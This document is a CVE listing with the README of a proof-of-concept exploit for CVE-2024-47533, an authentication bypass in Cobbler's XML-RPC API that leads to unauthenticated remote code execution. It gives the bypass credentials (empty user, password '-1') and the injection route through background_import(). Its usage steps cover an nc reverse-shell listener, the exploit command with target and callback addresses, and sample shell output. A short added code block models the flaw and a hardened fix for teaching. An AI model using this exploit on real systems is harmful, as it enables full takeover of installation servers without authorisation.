CVE-2024-47533 PoC — Cobbler allows anyone to connect to cobbler XML-RPC server with a known password and make changes

Associated Vulnerability
Title: Cobbler allows anyone to connect to cobbler XML-RPC server with a known password and make changes (CVE-2024-47533)
Description: Cobbler, a Linux installation server that allows for rapid setup of network installation environments, has an improper authentication vulnerability starting in version 3.0.0 and prior to versions 3.2.3 and 3.3.7. `utils.get_shared_secret()` always returns `-1`, which allows anyone to connect to cobbler XML-RPC as user `''` password `-1` and make any changes. This gives anyone with network access to a cobbler server full control of the server. Versions 3.2.3 and 3.3.7 fix the issue.
Readme
# CVE-2024-47533 – Cobbler XMLRPC Authentication Bypass → Reverse Shell (Unauthenticated RCE)

## 📌 Summary
This repository contains a **Proof-of-Concept (PoC) exploit** for **CVE-2024-47533**,  
a critical authentication bypass in Cobbler's XMLRPC API that leads to **unauthenticated remote code execution (RCE)**.

The exploit leverages the XMLRPC API's `login()` method flaw to bypass authentication and inject a reverse shell command via `background_import()`.

---

## ⚠️ Disclaimer
This tool is intended for **educational, research, and authorized penetration testing only**.  
Do **NOT** use it on systems you do not own or have explicit written permission to test.  
The author assumes **no liability** for misuse or damages.

---

## 🛠 Technical Details
- **Vulnerability Type:** Authentication Bypass → RCE  
- **Affected Component:** Cobbler XMLRPC API  
- **Attack Vector:** Network  
- **Privileges Required:** None  
- **User Interaction:** None  

**Root Cause:**  
`utils.get_shared_secret()` opens the shared-secret file in binary mode while also passing an encoding, so the read fails and the function falls back to returning `-1` instead of the real secret; the XMLRPC login therefore accepts an empty username with `-1` as the password.

**Impact:**  
An attacker can:
- Gain admin-level API access
- Inject arbitrary system commands into Cobbler templates
- Spawn a reverse shell on the target
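To make the root cause concrete, here is an added, self-contained model of the flawed secret reader beside a hardened one, with a minimal stand-in for the shared-secret login check. This is illustrative code written for this page, not Cobbler's own source; the file name `web.ss`, the sample secret and the `login_accepts()` helper are constructed for the demonstration.

```python
import os
import tempfile


def vulnerable_get_shared_secret(path):
    """Model of the flawed reader: open() in binary mode with an encoding=
    argument raises ValueError before the file is even read; the broad
    except swallows it and the sentinel -1 is returned as if it were
    the secret, no matter what the file actually contains."""
    try:
        with open(path, "rb", encoding="utf-8") as fd:
            data = fd.read()
    except Exception:
        return -1
    return data.decode("utf-8").strip()


def fixed_get_shared_secret(path):
    """Hardened reader: binary mode only, explicit decode, and fail closed.
    A read error raises instead of producing a value that doubles as a
    valid credential."""
    with open(path, "rb") as fd:
        data = fd.read()
    secret = data.decode("utf-8").strip()
    if not secret:
        raise RuntimeError("shared secret file is empty")
    return secret


def login_accepts(get_secret, path, username, password):
    """Constructed stand-in for the shared-secret login branch: an empty
    username is accepted only when the password equals the stored secret."""
    secret = get_secret(path)
    return username == "" and str(password) == str(secret)


def demo():
    """Create a constructed secret file and compare both readers."""
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "web.ss")  # constructed file name
        with open(path, "wb") as fd:
            fd.write(b"constructed-example-secret\n")  # constructed secret
        return {
            "vuln_accepts_-1": login_accepts(vulnerable_get_shared_secret, path, "", "-1"),
            "fixed_accepts_-1": login_accepts(fixed_get_shared_secret, path, "", "-1"),
            "fixed_accepts_real": login_accepts(fixed_get_shared_secret, path, "", "constructed-example-secret"),
        }


if __name__ == "__main__":
    print(demo())
```

The vulnerable reader returns `-1` even though the secret file exists and is readable, which is why the password is predictable on every affected install; the defensive lesson is that a credential-loading routine must raise on failure rather than return a sentinel.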

---

## 🚀 Usage

### 1️⃣ Clone the repository
```bash
git clone https://github.com/00xCanelo/CVE-2024-47533-PoC.git
cd CVE-2024-47533-PoC
```

### 2️⃣ Set up a listener
On your attacking machine:
```bash
nc -lvnp 4444
```

### 3️⃣ Run the exploit
```bash
python3 CVE-2024-47533.py -u http://<TARGET_IP>:<PORT>/RPC2 -l <LHOST> -p <LPORT>
```

**Example:**
```bash
python3 CVE-2024-47533.py -u http://192.168.1.50:25151/RPC2 -l 192.168.1.100 -p 4444
```

---

## 📂 File Structure
```
.
├── CVE-2024-47533.py  # Reverse shell exploit script
└── README.md          # Documentation
```

---

## 📸 Example Output
```plaintext
[*] Target: http://192.168.1.50:25151/RPC2
[*] Listener: 192.168.1.100:4444
[*] Payload: bash
[*] Connecting to Cobbler...
[*] Authenticating...
[*] Executing exploit...
[+] Exploit sent! Got A Shell 🔥.
```

---

## 🧑‍💻 Author
**00xCanelo**  
[GitHub Profile](https://github.com/00xCanelo)

---

## 📚 References
- [NVD: CVE-2024-47533](https://nvd.nist.gov/vuln/detail/CVE-2024-47533)
- [Cobbler Project GitHub](https://github.com/cobbler/cobbler)